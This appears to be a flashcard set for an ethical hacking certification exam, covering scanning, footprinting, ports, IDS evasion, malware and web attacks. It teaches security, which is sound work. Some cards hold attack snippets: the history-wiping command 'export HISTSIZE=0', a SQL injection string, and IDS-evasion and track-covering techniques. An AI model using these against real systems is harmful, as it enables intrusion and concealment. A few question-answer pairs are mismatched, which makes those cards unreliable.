Another member of your security team is confused about cross-site scripting (XSS) attacks. You explain how phishing attempts can use XSS to replace existing content on the webpage. She decides to write a simple JavaScript XSS defacement function. Which document object method(s) should you suggest she use? (Choose all that apply.) A)adoptNode() B)getElementsByTagName() C)getElementById() D)importNode() E)open() F)renameNode() G)write()

B)IDS

As an ethical hacker, you are using Nmap port scanning and must try to evade a certain type of device. You are using the following techniques: Break the network scans up into smaller ranges, with delays in between each scan. Break up IP packets into fragments. Which type of device are you most likely attempting to evade? A)Firewall B)IDS C)Router D)NAC

document all the findings

At the end of pen testing ______.

permission

Ethical hackers perform security assessments of their organization with the _____ of the concerned authorities

-U

Hping sets the URG flag

hides the messages in ASCII text

In white space steganography, the user ___ by adding white spaces to the end of the lines

Proxy Switcher

What tool hides your IP address from the websites you visit?

TCPTROJAN

Which of the following is not a trojan? A) BO2K B) LOKI C) Subseven D) TCPTROJAN

ALE

___ is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE).

network activity

Necurs monitors and filters ___ and has been observed to send spam and install rogue security software

<1D> GROUP

NetBIOS code and type for Master browser for the subnet.

<20> UNIQUE

NetBIOS code and type for Server service running

<03> UNIQUE

NetBIOS code and type for Service running on the system.

HTTPS (TCP)

Port number 443

SMB (TCP)

Port number 445

Syslog

Port number 514

DNS (TCP, UDP)

Port number 53

Internet Printing Protocol

Port number 631

DHCP (UDP)

Port number 67

"export HISTSIZE=0"

Attackers can use the ___ command to delete the command history and the specific commands they used to hide log files

bypass firewall rules and logging mechanisms

Attackers use stealth scanning techniques to ___ and disguise their activity as usual network traffic

social engineering

Attackers use this metadata and hidden information in order to perform ___ and other attacks

ICMP echo and ICMP reply

Attackers use the ICMP tunneling technique, which uses ____ packets as a carrier for the TCP payload, to access or control a system stealthily

live hosts on the network; services (application name and version); type of packet filters/firewalls; operating systems; OS versions

Attackers use Nmap to extract information such as __ (application name and version), __, __

privileged user accounts

Attackers using these exploits can access ___ and credentials

application-level attacks

Attacks on the actual programming code of an application.

Shrink-wrap code attacks

Attacks that take advantage of the built-in code and scripts most off-the-shelf applications come with.

something you know (user ID and password), something you have (smart card or token), something you are (biometrics)

Authentication measures are categorized by ___, ___, ___.

This flag signifies an ordered close to communications.

FIN (Finish)

Port is open (Xmas scan)

FIN + URG + PUSH --> <-- No Response

Port is closed (Xmas scan)

FIN + URG + PUSH --> <-- RST

TCP Session Termination

FIN --> <-- ACK <-- FIN ACK -->

RFC 793-based

FIN scan works only with OSes that have an __ TCP/IP implementation

Layer 7 Application

FTP, HTTP, SMTP, etc. reside at what layer of the OSI model?

appending a dot (.)

Files in UNIX can be hidden just by ___ in front of a file name

- Search for the target company's external URL in a search engine - Sub-domains provide an insight into the different departments and business units in an organization - You may find a company's sub-domains by trial and error or by using a service such as Netcraft - You can use the Sublist3r Python script, which enumerates subdomains across multiple sources at once

Finding Company's Top-level Domains (TLDs) and Sub-domains

Know Security Posture

Footprinting allows attackers to know the external security posture of the target organization

as the process of gathering information on computer systems and networks.

Footprinting is defined as:

first step, publicly available sensitive information

Footprinting is the ____ of any attack on information systems; attackers gather _____, which they use to perform social engineering, system and network attacks, etc., leading to huge financial loss and loss of business reputation

- Prevent DNS record retrieval from publicly available servers - Prevent information leakage - Prevent social engineering attempts

Footprinting pen testing helps an organization to:

D. EAL (Evaluation Assurance Level)

Four terms make up the Common Criteria process. Which of the following contains seven levels used to rate the target? A. ToE B. ST C. PP D. EAL

Using Reverse HTTP Shells, Using Reverse ICMP Tunnels, Using DNS Tunneling, Using TCP Parameters

Four ways to Covering Tracks on Network

competitive intelligence

Freely and readily available information on an organization that can be gathered by a business entity about its competitor's customers, products, and marketing. It can be used by an attacker to build useful information for further attacks.

C. 217.88.53.154

From the partial e-mail header provided, which of the following represents the true originator of the e-mail message? Return-path: <[email protected]> Delivery-date: Wed, 13 Apr 2011 00:31:13 +0200 Received: from mailexchanger.anotherbiz.com([220.15.10.254]) by mailserver.anotherbiz.com running ExIM with esmtp id xxxxxx-xxxxxx-xxx; Wed, 13 Apr 2011 01:39:23 +0200 Received: from mailserver.anybiz.com ([158.190.50.254] helo=mailserver.anybiz.com) by mailexchanger.anotherbiz.com with esmtp id xxxxxx-xxxxxx-xx for [email protected]; Wed, 13 Apr 2011 01:39:23 +0200 Receved: from SOMEONEComputer [217.88.53.154] (helo=[SOMEONEcomputer]) by mailserver.anybiz.com with esmtpa (Exim x.xx) (envelope-from <[email protected]) id xxxxx-xxxxxx-xxxx for [email protected]; Tue, 12 Apr 2011 20:36:08 -0100 Message-ID: <[email protected]> Date: Tue, 12 Apr 2011 20:36:01 -0100 X-Mailer: Mail Client From: SOMEONE Name<[email protected]> To: USERJOE Name<[email protected]> Subject: Something to consider ... A. 220.15.10.254 B. 158.190.50.254 C. 217.88.53.154 D. The e-mail header does not show this information

B) The CAM table of the switch will overflow, causing the switch to broadcast all packets received

Frustrated by the inability to sniff traffic on a switch, an attacker sends thousands of ARP messages through the switch. What is the attacker trying to accomplish? A) The MAC address pairings on the computer will become confused B) The CAM table of the switch will overflow, causing the switch to broadcast all packets received C) The CAM table will set up false MAC address to port matches, resulting in mis-delivery of packets D) The CAM table will overflow, forcing the switch to reboot

www.alexa.com

A company's online reputation (as well as the company's efforts to control it) and the actual traffic statistics of the company's web traffic can be found where?

Teardrop

custom fragmented packets

Sarbanes-Oxley (SOX)

was created to make corporate disclosures more accurate and reliable in order to protect the public and investors from shady behavior.

execute malicious programs

Attackers can use this technique to ___ at system startup, maintain persistence, perform remote execution, escalate privileges, etc.

network topology, trusted routers, firewall locations

Attackers conduct traceroute to extract information about: _______

inject malicious script

Attackers create web shells to ___ on a web server to maintain persistent access and escalate privileges

Shrink Wrap Code Attacks

Attackers exploit the default configuration and settings of off-the-shelf libraries and code

steal critical system information such as credentials, secret keys

Attackers exploit these vulnerabilities to gain unauthorized access and ___, etc., stored in the application's memory, in order to escalate privileges

SecurityFocus, Exploit Database

Attackers search for an exploit based on the OS and software application on exploit sites such as ___, ___

gain access to a system

Attackers search for vulnerabilities in an operating system's design, installation or configuration and exploit them to ______

TCP probe packets with ACK flag

Attackers send ___ set to a remote device and then analyze the header information (TTL and WINDOW fields) of the received RST packets to find whether the port is open or closed

TCP probe packets

Attackers send ___ with a TCP flag (FIN, URG, PSH) set or with no flags; no response means the port is open and RST means the port is closed

Netcat (Banner Grabbing)

This utility reads and writes data across network connections, using the TCP/IP protocol

Launchd

___ is used in MacOS and OS X boot-up to complete the system initialization process by loading parameters for each launch-on-demand system-level daemon

D) Hacktivism

_____ occurs when a hacker performs attacks because of political motivation A) Black hat hacking B) Gray box attacks C) Black box attacks D) Hacktivism

Banner Grabbing

_____ or OS fingerprinting is the method to determine the operating system running on a remote target system.

port is filtered; port is not filtered

Attackers send an ACK probe packet with a random sequence number; no response means ___ (a stateful firewall is present) and an RST response means the ___

inventory of live systems

Attackers then use ping sweep to create an ____ in the subnet

Port Scanning Countermeasures

1) Configure firewall and IDS to detect and block probes 2) Run the port scanning tools against hosts on the network to determine whether the firewall properly detects the port scanning activity 3) Ensure that the mechanisms used for routing and filtering at the routers and firewalls respectively cannot be bypassed using particular source ports or source-routing methods 4) Ensure that the router, IDS, and firewall firmware are updated to their latest releases 5) Use a custom rule set to lock down the network and block unwanted ports at the firewall 6) Filter all ICMP messages (i.e. inbound ICMP message types and outbound ICMP type 3 unreachable messages) at the firewalls and routers 7) Perform TCP and UDP scanning along with ICMP probes against your organization's IP address space to check the network configuration and its available ports 8) Ensure that the anti-scanning and anti-spoofing rules are configured

Banner Grabbing Countermeasures: Disabling or Changing Banner

1) Display false banners to misguide attackers 2) Turn off unnecessary services on the network host to limit the information disclosure 3) Use tools such as ServerMask (http://www.port80software.com) to disable or change banner information 4) Apache 2.x with the mod_headers module - use a directive in the httpd.conf file to change banner information: Header set Server "New Server Name" 5) Alternatively, change the ServerSignature line to ServerSignature Off in the httpd.conf file

Banner Grabbing Countermeasures: Hiding File Extensions from Web Pages

1) File extensions reveal information about the underlying server technology that an attacker can utilize to launch attacks 2) Hide file extensions to mask the web technology 3) Change application mappings such as .asp to .htm or .foo, etc. to disguise the identity of the servers 4) Apache users can use mod_negotiation directives 5) IIS users can use tools such as PageXchanger to manage the file extensions

IP Identification Number

1) Send a probe to the host of the suspected spoofed traffic that triggers a reply, and compare its IP ID with the suspect traffic 2) If the IP IDs are not close to the value of the packet being checked, the suspect traffic is spoofed 3) This technique is successful even if the attacker is in the same subnet

IDS Evasion Techniques

1) Use fragmented IP packets 2) Spoof your IP address when launching attacks and sniff responses from the server 3) Use source routing (if possible) 4) Connect to proxy servers or compromised trojaned machines to launch attacks

Proxy Chaining

1) User requests a resource from the destination 2) Proxy client at the user's system connects to a proxy server and passes the request to the proxy server 3) The proxy server strips the user's identification information and passes the request to the next proxy server 4) This process is repeated by all the proxy servers in the chain 5) At the end, the unencrypted request is passed to the web server

Access control list (ACL)

A method of defining what rights and permissions an entity has to a given resource.

penetration testing

A method of evaluating the security of a computer system or network by simulating an attack from a malicious source.

daisy chaining

A method of external testing whereby several systems or resources are used together to make an attack.

CNAME record

A Canonical Name record within DNS, used to provide an alias for a domain name.

A. Scanning

A Certified Ethical Hacker (CEH) follows a specific methodology for testing a system. Which step comes after footprinting in the CEH methodology? A. Scanning B. Enumeration C. Reconnaissance D. Application attack

acknowledgment (ACK)

A TCP flag notifying an originating station that the preceding packet (or packets) has been received

Permissive

A ___ policy blocks only things that are known to be naughty or dangerous.

reverse DNS resolution

A ____ is carried out to identify the host names doing a List Scan

daemon

A background process found in Unix, Linux, Solaris, and other Unix-based operating systems.

cold site

A backup facility with the electrical and physical components of a computer facility, but with no computer equipment in place. The site is ready to receive the necessary replacement computer equipment in the event the user has to move from his main computing location to an alternate site.

cloning

A cell phone attack in which the serial number from one cell phone is copied to another in an effort to copy the cell phone.

A) Anomaly based

A client asks you about intrusion detection systems. They want a system that dynamically learns traffic patterns and alerts on abnormal traffic. Which IDS would you recommend? A) Anomaly based B) Pattern based C) Signature based D) None of the above

D. Configure server side input validation on all web forms

A client is concerned about web server security. In addition to taking steps against buffer overflows on several web applications, the client wants to mitigate against cross site scripting from the web front ends. Which of the following would be the best choice to assist in this? A. Perform a vulnerability scan using NESSUS B. Perform a penetration test like scan against the server using Metasploit C. Ensure only the Apache web server is in use D. Configure server side input validation on all web forms

A. Buffer Overflow

A client's web application appears to have an excessive number of GETS. Which attack is this software potentially susceptible to? A. Buffer Overflow B. Brute Force C. SQL Injection D. Parameter Tampering

community cloud

A cloud model where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.

ad hoc mode

A mode of operation in a wireless LAN in which clients send data directly to one another without utilizing a wireless access point (WAP), much like a point-to-point wired connection.

B. An ACK scan using hping3 on port 80 for a group of addresses

A colleague enters the following command: root@mybox: # hping3 -A 192.168.2.x -p 80 What is being attempted here? A. An ACK scan using hping3 on port 80 for a single address B. An ACK scan using hping3 on port 80 for a group of addresses C. Address validation using hping3 on port 80 for a single address D. Address validation using hping3 on port 80 for a group of addresses

D. The search engine will respond with only those pages having the word intranet in the title and URL and with human resources in the text.

A colleague enters the following into a Google search string: intitle:intranet inurl:intranet:+intext:"human resources" Which of the following is most correct concerning this attempt? A. The search engine will not respond with any result because you cannot combine Google hacks in one line. B. The search engine will respond with all pages having the word intranet in their title and human resources in the URL. C. The search engine will respond with all pages having the word intranet in the title and in the URL. D. The search engine will respond with only those pages having the word intranet in the title and URL and with human resources in the text.

archive

A collection of historical records or the place where they are kept. In computing, an ___ generally refers to backup copies of logs and/or data.

Telnet for banner grabbing

A common method of performing banner grabbing is to use a simple tool already built into most operating systems, ____.

B. Ensuring there are no A records for internal hosts on the public-facing name server

A company has a publicly facing web application. Its internal intranet-facing servers are separated and protected by a firewall. Which of the following choices would be helpful in protecting against unwanted enumeration? A. Allowing zone transfers to ANY B. Ensuring there are no A records for internal hosts on the public-facing name server C. Changing the preference number on all MX records to zero D. Not allowing any DNS query to the public-facing name server

C)DNS zone transfer enumeration

A company hosts a public web application and an internal Intranet protected by a firewall. All DNS queries go through a single DNS server. Due to security concerns, your company deployed a second internal DNS server. You remove all the internal A resource records from the old DNS server and configure it to only communicate with external entities using an external DNS zone. The new internal DNS server contains only the internal zone with internal resource records. What should this countermeasure protect against? A)DNS hijacking B)DNS cache poisoning C)DNS zone transfer enumeration D)DoS attacks

crossover error rate (CER)

A comparison metric for different biometric devices and technologies; the point at which the false acceptance rate (FAR) equals the false rejection rate (FRR). As an identification device becomes more sensitive or accurate, its FAR decreases while its FRR increases. The CER is the point at which these two rates are equal, or cross over.

buffer overflow

A condition that occurs when more data is written to a buffer than it has space to store, which results in data corruption or other system errors. This is usually because of insufficient bounds checking, a bug, or improper configuration in the program code.

A)Social engineering

A customer receives an unsolicited call from a known software company. The person on the other end requires the customer to verify their user credentials over the phone. Which term describes this type of hacking? A)Social engineering B)Tailgating C)Soft skills D)Gumshoeing

cracker

A cyberattacker who acts without permission from, and gives no prior notice to, the resource owner. This is also known as a malicious hacker.

D)Maps out the tables within the database he is trying to exploit

A database administrator contacts you regarding the database he administers. He is concerned that an attacker is using database fingerprinting. What does this do? A)Attempts to run SQL statements B)Causes the SQL database to shut down C)Provides information about the server on which the database resides D)Maps out the tables within the database he is trying to exploit

Script kiddie

A derogatory term used to describe an attacker, usually new to the field, who uses simple, easy-to-follow scripts or programs developed by others to attack computer systems and networks and deface websites.

Anonymizer

A device or service designed to obfuscate traffic between a client and the Internet. It is generally used to make activity on the Internet as untraceable as possible.

Suicide hacker

A hacker who aims to bring down critical infrastructure for a "cause" and does not worry about the penalties associated with his actions.

Backdoor

A hidden capability in a system or program for bypassing normal computer authentication systems.

A) Time and date C) Actions D) Events

A logic bomb is activated by which of the following? A) Time and date B) Vulnerability C) Actions D) Events

B. An external threat can take advantage of the misconfigured X-server vulnerability. D. An internal threat can take advantage of the misconfigured X-server vulnerability

A machine in your environment uses an open X-server to allow remote access. The X-server access control is disabled, allowing connections from almost anywhere and with little to no authentication measures. Which of the following are true statements regarding this situation? (Choose all that apply.) A. An external vulnerability can take advantage of the misconfigured X-server threat. B. An external threat can take advantage of the misconfigured X-server vulnerability. C. An internal vulnerability can take advantage of the misconfigured X-server threat. D. An internal threat can take advantage of the misconfigured X-server vulnerability

unsolicited SYN/ACK

A machine that receives an ___ packet will respond with an RST. An unsolicited RST will be ignored

Mandatory access control (MAC)

A means of restricting access to system resources based on the sensitivity (as represented by a label) of the information contained in the system resource and the formal authorization (that is, clearance) of users to access information of such sensitivity.

Annualized loss expectancy (ALE)

A measurement of the cost of an asset's value to the organization and the monetary loss that can be expected for an asset due to risk over a one-year period.

B. False negatives

A network and security administrator installs an NIDS. After a few weeks, a successful intrusion into the network occurs and a check of the NIDS during the timeframe of the attack shows no alerts. An investigation shows the NIDS was not configured correctly and therefore did not trigger on what should have been attack alert signatures. Which of the following best describes the actions of the NIDS? A. False positives B. False negatives C. True positives D. True negatives

D) Python

A new network administrator is asked to schedule daily scans of systems throughout the enterprise. Which of the following programming languages has an OSI-approved open source license and is commonly used for accomplishing this goal? A) ASP.NET B) PHP C) C# D) Python

B) The team is practicing passive footprinting D) The team is gathering competitive intelligence

A pen test team starts a particular effort by visiting the company's website; a team member goes to social networking sites and job boards looking for information and building a profile on the organization. Which of the following statements are true regarding these efforts? (Choose two) A) The team is practicing active footprinting B) The team is practicing passive footprinting C) The team is gathering sensitive information that should be protected D) The team is gathering competitive intelligence

D) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-500 will return the name of the true administrator account

A penetration test team member is running user2sid commands on a machine. After entering the command: User2sid \\218.55.62.3 guest, She receives an output of: S-1-5-21-861567501-1383384898-839522115-501 Which of the following is true regarding this output? A) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-501 will return the name of the true administrator account B) Running the command sid2user S-1-5-21-861567500-1383384898-839522115-501 will return the name of the true administrator account C) Running the command sid2user S-1-5-21-861567501-1383384898-500-501 will return the name of the true administrator account D) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-500 will return the name of the true administrator account

A. The background web application used the first record it could find in the table

A penetration tester finds a web application offering an error message with an entry area for an e-mail account. The penetration tester enters ' or '1'='1 into the field and presses <ENTER>. A message appears stating "Your login information has been mailed to [email protected]." What is the likely reason for this? A. The background web application used the first record it could find in the table B. The background web application used a random record from the table C. The background web application has crashed D. The background web application is now stuck in a loop

D) Cain

A penetration tester has gained access to a .pcf file. Which of the following tools could be useful in decoding passwords embedded in the file? A) Nessus B) Nmap C) John the Ripper D) Cain

A. Create a route statement within the meterpreter

A penetration tester is using Metasploit to attack an FTP server. He wants to use the FTP server as a launching point to "pivot" to an internal LAN segment. Which of the following should be accomplished to perform the attack? A. Create a route statement within the meterpreter B. Set payload action in the meterpreter to propagate C. Choose the pivot exploit D. Set network configuration parameters to reconfigure in the meterpreter

A)Data-mining techniques

A programmer from your company contacts you regarding a possible security breach. During the discussion, he asks you to identify and investigate unauthorized transactions. What should you use to provide him with this information? A)Data-mining techniques B)Reconnaissance C)Footprinting D)Banner grabbing

Bluetooth

A proprietary, open, wireless technology used for transferring data from fixed and mobile devices over short distances.

Address Resolution Protocol (ARP)

A protocol used to map a known IP address to a physical (MAC) address. It is defined in RFC 826.

URL embedding

A public use workstation contains the browsing history of multiple users who logged in during the last seven days. While digging through the history, a user runs across the following web address: www.snaz33enu.com/&w25/session-22525

Audit trail

A record showing which user has accessed a given resource and what operations the user performed during a given period.

tailgating

A security camera picks up someone who doesn't work at the company following closely behind an employee while they enter the building. What type of attack is taking place?

D)It will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets.

A security engineer runs the following Nmap command: nmap -sn -PE 192.168.1-5 What are the results of this scan? A)It will scan the first five hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. B)It will scan all hosts on the 192.168.1.0 subnet. C)It will scan the first host on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. D)It will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets.

confidentiality

A security objective that ensures a resource can be accessed only by authorized users. This is also the security principle that stipulates sensitive information is not disclosed to unauthorized individuals, entities, or processes.

A. The attacker took advantage of a zero-day vulnerability on the machine.

A security peer is confused about a recent incident. An attacker successfully accessed a machine in the organization and made off with some sensitive data. A full vulnerability scan was run immediately following the theft, and nothing was discovered. Which of the following best describes what may have happened? A. The attacker took advantage of a zero-day vulnerability on the machine. B. The attacker performed a full rebuild of the machine after he was done. C. The attacker performed a denial-of-service attack. D. Security measures on the device were completely disabled before the attack began.

C. Ensure that any remaining risk is residual or low and accept the risk.

A security team is implementing various security controls across the organization. After several configurations and applications, a final agreed-on set of security controls are put into place; however, not all risks are mitigated by the controls. Of the following, which is the next best step? A. Continue applying controls until all risk is eliminated. B. Ignore any remaining risk as "best effort controlled." C. Ensure that any remaining risk is residual or low and accept the risk. D. Remove all controls.

500

A simple scanning for ISAKMP at UDP port ___ can indicate the presence of a VPN gateway

computer-based attack

A social engineering attack using computer resources such as e-mail and IRC

bug

A software or hardware defect that often results in system vulnerabilities.

Algorithm

A step-by-step method of solving a problem.

cache

A storage buffer that transparently stores data so future requests for the same data can be served faster.

community string

A string used for authentication in SNMP

block cipher

A symmetric key cryptographic algorithm that transforms a block of information at a time using a cryptographic key.

Blowfish

A symmetric, block-cipher data-encryption standard that uses a variable-length key that can range from 32 bits to 448 bits.

C)Location anonymity

A systems administrator reports to you that an attacker used a TOR proxy to carry out an attack against your network. What does this proxy provide to the attacker? A)Payload obscurity B)Packet fragmentation C)Location anonymity D)Overlapping fragments

B. The attacker will see message 2.

A target machine (with a MAC of 12:34:56:AB:CD:EF) is connected to a switch port. An attacker (with a MAC of 78:91:00:ED:BC:A1) is attached to a separate port on the same switch with a packet capture running. There is no spanning of ports or port security in place. Two packets leave the target machine. Message 1 has a destination MAC of E1:22:BA:87:AC:12. Message 2 has a destination MAC of FF:FF:FF:FF:FF:FF. Which of the following statements is true regarding the messages being sent? A. The attacker will see message 1. B. The attacker will see message 2. C. The attacker will see both messages. D. The attacker will see neither message.

A. --script D. -sC

A team member is using nmap and asks about the "scripting engine" in the tool. Which option switches can be used to invoke the nmap scripting engine? (Choose two.) A. --script B. -z C. -sA D. -sC

B. It displays the NetBIOS name cache.

A team member issues the nbtstat.exe -c command. Which of the following best represents the intent of the command? A. It displays the IP route table for the machine. B. It displays the NetBIOS name cache. C. It displays active and inactive services. D. It puts a NIC into promiscuous mode for sniffing.

A)String formatting C)Buffer overflow E)Code injection F)Thread racing

A team of developers is creating mobile apps that target Apple iOS devices. Which of the following vulnerabilities should they address when using Objective-C? (Choose all that apply.) A)String formatting B)Memory corruption C)Buffer overflow D)Log injection E)Code injection F)Thread racing G)Access control H)Type confusion

cookie

A text file stored within a browser by a web server that maintains information about the connection. Cookies are used to store information to maintain a unique but consistent surfing experience but can also contain authentication parameters. They can be encrypted and have defined expiration dates.

B. User input is not sanitized, which can potentially be exploited

A user forgets her password to a website, and the web application asks her to enter her email to have the password emailed to her. She enters her email as [email protected]. The application displays a server error. What is most likely wrong with the web application? A. Nothing. The email is not valid and this is a normal response B. User input is not sanitized, which can potentially be exploited C. The web server installation has poor privilege control D. The application uses a back end database

D) 5 minutes

A user has chosen a 22 character password that is straight out of a dictionary. Approximately how long will it take to crack the password? A) 50 years B) 22 years C) 15 days D) 5 minutes

D. Cross site scripting

A user receives an e-mail with a link to an interesting forum. She clicks the link and is taken to a web based bulletin board; however, additional functions are carried out in the background under her user privileges. The functions allow the attacker access to information used on the BBS, even though no executables are downloaded and run on the user's machine. Which of the following best describes this attack? A. Backdoor B. Trapdoor C. Denial of Service D. Cross site scripting

cryptographic key

A value used to control cryptographic operations, such as decryption, encryption, signature generation, and signature verification.

D) Display pop-ups

A virus does not do which of the following? A) Replicate with user interaction B) Change configuration settings C) Exploit vulnerabilities D) Display pop-ups

boot sector virus

A virus that plants itself in a system's boot sector and infects the master boot record.

B. The password is never sent in clear text over the network

A web administrator chooses Digest authentication over Basic authentication on her website. Why is Digest authentication considered more secure than Basic authentication? A. Basic authentication uses single factor B. The password is never sent in clear text over the network C. The password is sent in clear text over the network but is never reused D. It uses Kerberos

B. The firewall doesn't protect against port 80 or port 443

A web server sits behind a firewall and offers HTTP and HTTPS access to a website and web applications. External users access the server for various web applications. Which of the following is true regarding the protection offered by the firewall? A. The firewall can detect malicious traffic and will halt attacks B. The firewall doesn't protect against port 80 or port 443 C. If properly configured, a firewall is the only protection needed to safeguard the server D. Authentication methods configured at the firewall can halt most attacks

Access point (AP)

A wireless LAN device that acts as a central point for all wireless traffic.

802.11i

A wireless LAN security standard developed by IEEE. Requires Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard (AES)

A. PTR B. MX D. SOA F. A

A zone file consists of which records? (Choose all that apply.) A. PTR B. MX C. SN D. SOA E. DNS F. A G. AX

-TTL based ACK flag probe scanning or -WINDOW based ACK flag probe scanning

ACK Probe Packets --> <-- RST

Layer 6 Presentation

AFP, NCP, MIME, etc. reside at what layer of the OSI model?

Asia and the Pacific

APNIC manages what areas?

Canada, many Caribbean and North Atlantic islands, and the United States.

ARIN manages what areas?

Layer 2 Data Link

ARP, CDP, PPP, etc. reside at what layer of the OSI model?

D)Create and enforce a physical security policy for remote employees.

Alice frequents coffee shops, libraries, and other public areas where your company's remote employees typically work. Alice knows that the username and password employees use to log in to their laptops are the same credentials used to access the company's virtual private network (VPN). When an employee first arrives and pulls out a laptop, Alice will position herself in a seat behind that employee. When the employee enters the login credentials to unlock the laptop, Alice will look over the employee's shoulder to see the username and which keys are typed for the password. What should the company do to prevent this shoulder surfing attack? A)Purchase and distribute privacy filter screens to remote employees. B)Implement and require full disk encryption for new and existing laptops. C)Apply asset tags with the text "Look over your shoulder!" on new laptops. D)Create and enforce a physical security policy for remote employees.

secretly track

All In One Keylogger allows you to ___ all activities from all computer users and automatically receive logs to a desired email/FTP/LAN account

exploit vulnerabilities

Attackers try various tools and attack techniques to ______ in a computer system or security policy and controls to achieve their motives

A)127.0.0.1

After a recent malware infection, one of the devices in your network is found to be continually changing its LAN connection settings to use itself as a proxy server. It resides in the 192.168.1.0/24 network. Which IP address will be used on the device for the proxy server? A)127.0.0.1 B)255.255.255.255 C)192.168.1.1 D)192.168.1.255

C)Installing a driver

After successfully executing a buffer overflow attack on a Windows machine, which of the following actions is NOT allowed in the security context of the LOCAL_SYSTEM account? A)Spawning a shell B)Changing the time zone C)Installing a driver D)Debugging an application

B) ACK

After the three-way handshake, which flag is set in packets sent in either direction? A) SYN B) ACK C) FIN D) XMAS

www.networksolutions.com www.godaddy.com www.register.com

After you have your IP address number and want to register your name where can you go?

content monitoring services up-to-date information

Alerts are the ____ that provide ____ based on your preference usually via email or SMS in an automated manner.

D)Allan will be unable to establish an interactive session

Allan has completed the following steps in an attempt to hack a web application:
-Obtained a valid session ID token via an XSS vulnerability
-Confirmed that the session ID manager validates the source IP address as well
-Spoofed the required IP address
-Replayed the session ID
What will be the result? A)The session ID manager will create a new session ID B)The session ID manager will determine the address is spoofed C)Allan will be able to establish an interactive session D)Allan will be unable to establish an interactive session

InSpy

Attackers use the ___ utility, which performs enumeration on LinkedIn and finds people based on job title, company, or email address

A. DNSRV1.anycomp.com, 3600 seconds

An SOA record gathered from a zone transfer is shown here:
@ IN SOA DNSRV1.anycomp.com. postmaster.anycomp.com. (
4 ; serial number
3600 ; refresh [1h]
600 ; retry [10m]
86400 ; expire [1d]
3600 ) ; min TTL [1h]
What is the name of the authoritative DNS server for the domain, and how often will secondary servers check in for updates? A. DNSRV1.anycomp.com, 3600 seconds B. DNSRV1.anycomp.com, 600 seconds C. DNSRV1.anycomp.com, 4 seconds D. postmaster.anycomp.com, 600 seconds

B. The administrator is configuring IP masquerading.

An administrator enters the following command on a Linux system: iptables -t nat -L Which of the following best describes the intent of the command entered? A. The administrator is attempting a port scan. B. The administrator is configuring IP masquerading. C. The administrator is preparing to flood a switch. D. The administrator is preparing a DoS attack.

B)tcpd

An administrator has configured SMTP and HTTP services running on a FreeBSD server. She wants to allow standard email and web traffic across registered ports 25, 80, and 443. However, any unauthorized access should be logged and denied. Which daemon should you use for logging and simple access control? A)smtpd B)tcpd C)httpd D)asmtpd

antivirus (AV) software

An application that monitors a computer or network to identify, and prevent, malware. ___ is usually signature-based and can take multiple actions on defined malware files/activity.

Zero-Day Attack

An attack that exploits computer application vulnerabilities before the software developer releases a patch for the vulnerability

Operating system (OS) attack

An attack that exploits the common mistake many people make when installing operating systems--that is, accepting and leaving all the defaults.

Active attack

An attack that is direct in nature -- usually where the attacker injects something into, or otherwise alters, the network or system target.

cross-site scripting (XSS)

An attack whereby the hacker injects code into an otherwise legitimate web page, which is then clicked by other users or is exploited via Java or some other script method. The embedded code within the link is submitted as part of the client's web request and can execute on the user's computer.

exploit the applications

An attacker can ___ with the setuid or setgid flags to execute malicious code with elevated privileges

B)FQDNs of all intermediary devices

An attacker is using the traceroute tool to carry out network footprinting. Which of the following may NOT be discovered using this tool? A)Structure of the network B)FQDNs of all intermediary devices C)IP addresses of routers and firewalls D)IP addresses of internal computers

Track company's online reputation
Collect company's search engine ranking information
Obtain email notifications when a company is mentioned online
Track conversations
Obtain social news about the target organization

An attacker makes use of ORM tracking tools to:

B)Decreases the packet send frequency of the scan

An attacker recently used Nmap to SYN scan your network. You discover that he adjusted the timing options of the scan, thereby avoiding detection by your network intrusion detection system (IDS). How does adjusting the timing options affect the Nmap scan? A)Identifies the operating systems being used on the network B)Decreases the packet send frequency of the scan C)Generates scanning decoys on the network D)Determines which network hosts are not available

A. The HTML file has permissions of read only

An attacker successfully executes a buffer overflow against an IIS web server. He spawns an interactive shell with plans to deface the main web page. An attempt to use the echo command to overwrite index.html does not work, and an attempt to delete the page altogether also fails. Additionally, an attempt to copy a new page in its place also fails. What is the probable cause of the attacker's problem? A. The HTML file has permissions of read only B. A buffer overflow attack cannot deface a web page C. The LOCAL_SYSTEM privilege level is insufficient for the attempts D. The server is using Kerberos authentication

B)Network sniffer

An attacker wants to be able to implement a man-in-the-middle (MITM) attack to capture authentication tokens used on a corporate network. Which type of tool would he use? A)Port scanner B)Network sniffer C)Penetration tester D)Vulnerability scanner

black hat

An attacker who breaks into computer systems with malicious intent, without the owner's knowledge or permission.

D)HR department

An employee has been found to be in direct violation of the company's security policy. When you inform him of the policy, he claims to know nothing about it. You need to find out if he was made aware of the security policy. Which entity should be able to confirm this? A)IT department B)Legal department C)Upper management D)HR department

Banner grabbing

An enumeration technique used to provide information about a computer system; generally used for operating system identification (also known as fingerprinting).

Annualized rate of occurrence (ARO)

An estimate of the number of times during a year a particular asset would be lost or experience downtime.

A. The port is filtered at the firewall.

An ethical hacker is ACK-scanning against a network segment he knows is sitting behind a stateful firewall. If a scan packet receives no response, what does that indicate? A. The port is filtered at the firewall. B. The port is not filtered at the firewall. C. The firewall allows the packet, but the device has the port closed. D. It is impossible to determine any port status from this response.

A. A white hat is attempting a black-box test

An ethical hacker is given no prior knowledge of the network and has a specific framework in which to work. The agreement specifies boundaries, nondisclosure agreements, and a completion date definition. Which of the following statements is true? A. A white hat is attempting a black-box test. B. A white hat is attempting a white-box test. C. A black hat is attempting a black-box test. D. A black hat is attempting a gray-box test.

ike-scan

Attackers can probe further using a tool such as ___ to enumerate the sensitive information including encryption and hashing algorithm, authentication type, key distribution algorithm, SA LifeDuration, etc.

A. A white hat is attempting a black-box test.

